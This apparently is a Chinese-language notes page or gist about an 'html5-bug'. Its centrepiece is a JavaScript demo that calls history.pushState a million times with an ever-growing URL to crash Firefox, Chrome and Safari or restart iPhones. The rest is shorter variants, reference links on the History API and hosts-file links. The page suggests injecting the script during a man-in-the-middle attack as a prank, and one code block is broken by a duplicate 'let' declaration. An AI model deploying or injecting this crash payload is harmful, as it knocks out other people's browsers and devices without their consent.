html5-bug

html5-bug.html

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>html5-bug</title>
</head>
<body>
    <div>
        <h1>demo：（温馨提示：请保存浏览器其它窗口的编辑任务）</h1>
        <a href="www.0xroot.cn/demo.html">www.0xroot.cn/demo.html (点击一下，又不会怀孕！)</a>
        <a href="https://laod.cn/tag/html5-bug/">https://laod.cn/tag/html5-bug/</a>
    </div>
    <script>
        let total = "";
        for (let i = 0; i < 1000000; i++){
           total += i.toString();
           history.pushState(0,0,total);
        }
        // https://laod.cn/tag/chrome/
        // https://laod.cn/tag/chrome/0123456789
        let total = "";
        for (let i = 0; i < 10; i++){
           total += i.toString();
           history.pushState(0,0,total);
        }
    </script>
</body>
</html>

laod.cn Google hosts

2016 Google hosts 持续更新【更新于:2017-05】

https://laod.cn/hosts/2016-google-hosts.html

https://laod.cn/hosts/2017-google-hosts.html

https://iiio.io/download/20170509/

提取码：https 解压密码：laod.cn

Windows 开始 -> 运行 -> 输入cmd -> 在CMD窗口输入: ipconfig /flushdns

代码审计

https://laod.cn/code-audit/how-does-google-find-our-pages.html

https://laod.cn/code-audit/jquery-is-not-a-function.html

https://laod.cn/code-audit/linux-file-permissions.html

https://laod.cn/code-audit/google-search-results-py-script.html

https://laod.cn/code-audit/nginx-google-fonts-ajax-gravatar-reverse-proxy.html

https://laod.cn/code-audit/html5-bug-crash-firefox-chrome-safari-browsers-and-also-restart-iphone-using-this-javascript-code-dos-0day-exploit.html

<html>
<head>
    <title>html5-bug</title>
</head>
<body>
    <div>
        <h1>demo：（温馨提示：请保存浏览器其它窗口的编辑任务）</h1>
        <a href="www.0xroot.cn/demo.html">www.0xroot.cn/demo.html (点击一下，又不会怀孕！)</a>
        <a href="https://laod.cn/tag/html5-bug/">https://laod.cn/tag/html5-bug/</a>
    </div>
<script>
    var total="";
    for (var i=0;i<1000000;i++){
       total= total + i.toString();
       history.pushState(0,0,total);
    }
</script>
</body>
</html>


这是Bug还是0day?为什么会有这一现象？
如何实现的？
有哪些比较有意思的利用姿势？
(我先来个:当在执行MITM中间人攻击的时候，可以注入这一段js，来个恶搞整蛊。然后都懂的...)


https://laod.cn/tag/chrome/


<script>
    // https://laod.cn/tag/chrome/
    // https://laod.cn/tag/chrome/0123456789
    let total = "";
    for (let i = 0; i < 10; i++){
       total += i.toString();
       history.pushState(0,0,total);
    }
</script>

https://laod.cn/news/google-https-chrome-62.html

https://laod.cn/tools/google-chrome-57.html

https://laod.cn/news/firefox-chrome-bug.html

https://laod.cn/tools/10-best-chrome-extensions.html

https://www.w3schools.com/browsers/default.asp

https://laod.cn/news/chrome-vr-webvr.html
https://laod.cn/news/chrome-flash.html

movie

https://laod.cn/movie/mr-robot-s02.html

https://laod.cn/movie/mr-robot.html

        let total = "#";
        for (let i = 0; i < 10; i++){
           total += i.toString();
           history.pushState(0,0,total);
        }

history 对象

http://javascript.ruanyifeng.com/bom/history.html

操纵浏览器的历史记录

https://developer.mozilla.org/zh-CN/docs/DOM/Manipulating_the_browser_history

HTML5 简介（三）：利用 History API 无刷新更改地址栏

https://www.renfei.org/blog/html5-introduction-3-history-api.html

HTML5之pushstate、popstate操作history，无刷新改变当前url

http://frontenddev.org/article/html-5-pushstate-popstate-operating-history-no-refresh-to-change-the-current-url.html

ajax与HTML5 history pushState/replaceState实例

http://www.zhangxinxu.com/wordpress/2013/06/html5-history-api-pushstate-replacestate-ajax/

再详解history.pushState和history.replaceState以及page ajax的实现

http://www.tangshuang.net/2287.html

Using the HTML5 History API

https://css-tricks.com/using-the-html5-history-api/

https://stackoverflow.com/questions/4570093/how-to-get-notified-about-changes-of-the-history-via-history-pushstate

https://stackoverflow.com/questions/17612307/pushstate-what-exactly-is-the-state-object-for

https://gist.github.com/xgqfrms-GitHub/1ba83e991eb358338151f54e5805ac5d